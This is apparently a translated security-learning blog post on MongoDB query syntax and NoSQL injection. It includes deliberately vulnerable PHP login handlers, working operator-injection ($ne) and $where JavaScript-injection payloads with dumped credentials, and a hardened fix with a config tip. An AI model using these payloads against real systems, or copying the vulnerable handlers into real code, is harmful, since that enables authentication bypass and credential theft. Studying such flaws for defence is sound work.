Reference:
https://blog.csdn.net/LYJ20010728/article/details/120315956
Pulling the official image with Docker is all that is needed to get MongoDB running:
docker pull mongo:latest
Basic use of MongoDB
The commands for listing databases and tables resemble MySQL's:
show databases (MySQL) == show dbs (MongoDB)
show tables (MySQL) == show collections (MongoDB)
To create a database, simply run use <database name>; if it does not exist, MongoDB creates it for you. To create a collection (the equivalent of a table):
db.createCollection("<collection name>")
To return every document in a collection: db.<collection>.find(), the equivalent of MySQL's select * from <table>;
To query for specific content, the filter is written in a JSON-like form:
db.<collection>.find({"key":"value","key":"value"})
WHERE-style conditions in MongoDB
MongoDB provides a set of special operators that act as query conditions:
db.sys.find({"age":{$ne:10}}) // similar to where age != 10
{ "_id" : ObjectId("652c90b097e2eacd0ca2eded"), "name" : "zhangsan", "age" : "18" }
{ "_id" : ObjectId("652cd4b4bc8262ecb7b950a0"), "name" : "lisi", "age" : "20" }
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
{ "_id" : ObjectId("652cd74dbc8262ecb7b950a2"), "name" : "xiaofu", "age" : 17 }
{ "_id" : ObjectId("652cd776bc8262ecb7b950a3"), "name" : "xiaofu2", "age" : 17 }
{ "_id" : ObjectId("652cd783bc8262ecb7b950a4"), "name" : "liliu", "age" : 30 }
Note that zhangsan and lisi have age stored as a string ("18", "20"), so the numeric $gt comparison below does not match them: MongoDB's $gt/$lt only compare values of the same BSON type.
db.sys.find({"age":{$gt:10}}) // similar to where age > 10
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
{ "_id" : ObjectId("652cd74dbc8262ecb7b950a2"), "name" : "xiaofu", "age" : 17 }
{ "_id" : ObjectId("652cd776bc8262ecb7b950a3"), "name" : "xiaofu2", "age" : 17 }
{ "_id" : ObjectId("652cd783bc8262ecb7b950a4"), "name" : "liliu", "age" : 30 }
db.sys.find({"age":{$gt:20}}) // similar to where age > 20
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
{ "_id" : ObjectId("652cd783bc8262ecb7b950a4"), "name" : "liliu", "age" : 30 }
AND and OR conditions in MongoDB
By default, multiple fields in a filter are combined with AND.
OR is slightly more involved: it has to be specified at the top level of the filter as $or : [ {condition1} , {condition2} ]
db.sys.find({$or:[{"name":"zhangsan"},{"age":{$ne:17}}]})
{ "_id" : ObjectId("652c90b097e2eacd0ca2eded"), "name" : "zhangsan", "age" : "18" }
{ "_id" : ObjectId("652cd4b4bc8262ecb7b950a0"), "name" : "lisi", "age" : "20" }
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
MongoDB injection demo 1
The environment was built with the xiaopi (phpStudy) panel on Linux. Two pitfalls to watch for: after installing the database, uncomment the extension=mongodb line in php.ini, and allow port 27017 in the panel's firewall.
<?php
show_source(__FILE__);
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
// Intentionally vulnerable demo: request parameters go straight into the filter,
// so an array such as username[$ne]=0 is passed through as a query operator.
$username = $_POST['username'];
$password = $_POST['password'];
$query = new MongoDB\Driver\Query(array(
    'username' => $username,
    'password' => $password
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
    foreach ($result as $user) {
        $user = ((array)$user);
        echo "Login Success".PHP_EOL;
        echo 'username:' . $user['username'].PHP_EOL;
        echo 'password:' . $user['password'].PHP_EOL;
    }
} else {
    echo 'Login Failed';
}
Sending username[$ne]=0&password[$ne]=0 returns every account and password in the collection.
The author of the referenced article already explains the principle very clearly: PHP is a loosely typed language, so when a parameter is passed as an array it is parsed into a JSON-like structure; here I add $ne, i.e. the != condition.
What I sent was username[$ne]=0&password[$ne]=0, and the statement actually executed in the database is:
db.users.find({"username":{$ne:0},"password":{$ne:0}})
{ "_id" : ObjectId("652cc700627bdd35ea36d221"), "username" : "admin", "password" : "123" }
{ "_id" : ObjectId("652cc70a627bdd35ea36d222"), "username" : "sys", "password" : "123456" }
{ "_id" : ObjectId("652ce782627bdd35ea36d223"), "username" : "flag", "password" : "flag{xxxx-xxxxx}" }
JavaScript injection in MongoDB
MongoDB can execute JavaScript code, as in the following small demo:
<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
// Intentionally vulnerable demo: user input is concatenated into a JavaScript
// function that the server evaluates through $where.
$function = "
function() {
    var username = '".$username."';
    var password = '".$password."';
    if(username == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
}";
$query = new MongoDB\Driver\Query(array(
    '$where' => $function
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
    foreach ($result as $user) {
        $user = ((array)$user);
        echo "Login Success".PHP_EOL;
        echo 'username:' . $user['username'].PHP_EOL;
        echo 'password:' . $user['password'].PHP_EOL;
    }
} else {
    echo 'Login Failed';
}
username=1&password=1';return true// It also works without commenting out the leftover single quote; using $comment='123456 to absorb it works as well.
After this input, the function that actually runs is:
function() {
    var username = '1';
    var password = '1';return true//'';
    if(username == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
}
What is executed in the database is:
db.users.find({$where: "function() { var username = '1';var password = '1';return true;var a='1';if(username == 'admin' && password == '123456'){ return true; }else{ return false; }}"})
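A hardened version of the two login handlers above, added here as an example and not code from the original post: it rejects any parameter that is not a plain string (which is what stops username[$ne]=0 from turning into an operator) and never builds a $where function from request data. It assumes the MongoDB\Driver extension and the test.users collection used in the post.

```php
<?php
// Added example (not the original post's code). Assumes the MongoDB\Driver
// extension and the test.users collection from the post.

// Returns the equality filter for the login lookup, or null when either
// field is missing, not a plain string, or unreasonably long.
// PHP parses username[$ne]=0 into ['$ne' => '0']; is_string() rejects that
// before it can become {"username":{"$ne":"0"}} in the query.
function buildLoginFilter(array $post): ?array
{
    foreach (['username', 'password'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return null;
        }
        if (strlen($post[$field]) > 64) {   // arbitrary limit for the demo
            return null;
        }
    }
    // Plain equality only: no $where, so no JavaScript is ever built from input.
    // (In a real application the password would be stored hashed and checked
    // with password_verify() after fetching the user, not matched in the query.)
    return ['username' => $post['username'], 'password' => $post['password']];
}

function login(MongoDB\Driver\Manager $manager, array $post): bool
{
    $filter = buildLoginFilter($post);
    if ($filter === null) {
        return false;                    // reject without touching the database
    }
    $query  = new MongoDB\Driver\Query($filter, ['limit' => 1]);
    $cursor = $manager->executeQuery('test.users', $query);
    return count($cursor->toArray()) === 1;
}

// Constructed inputs mirroring the post's payloads; no database needed for these calls.
$operatorInjection = ['username' => ['$ne' => '0'], 'password' => ['$ne' => '0']];
var_dump(buildLoginFilter($operatorInjection));   // rejected: both fields are arrays, not strings
$jsInjection = ['username' => '1', 'password' => "1';return true//"];
var_dump(buildLoginFilter($jsInjection));         // accepted, but only as literal data to compare against
$normal = ['username' => 'admin', 'password' => '123'];
var_dump(buildLoginFilter($normal));              // accepted: a plain equality filter
```

On the server side, setting security.javascriptEnabled: false in mongod.conf disables $where evaluation entirely, so a handler like the post's second demo would fail instead of running the injected function.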
Originally published on the WeChat public account 飞奔的狸花猫: 记录一次NoSql数据库的注入学习 (Notes from a NoSQL database injection study session)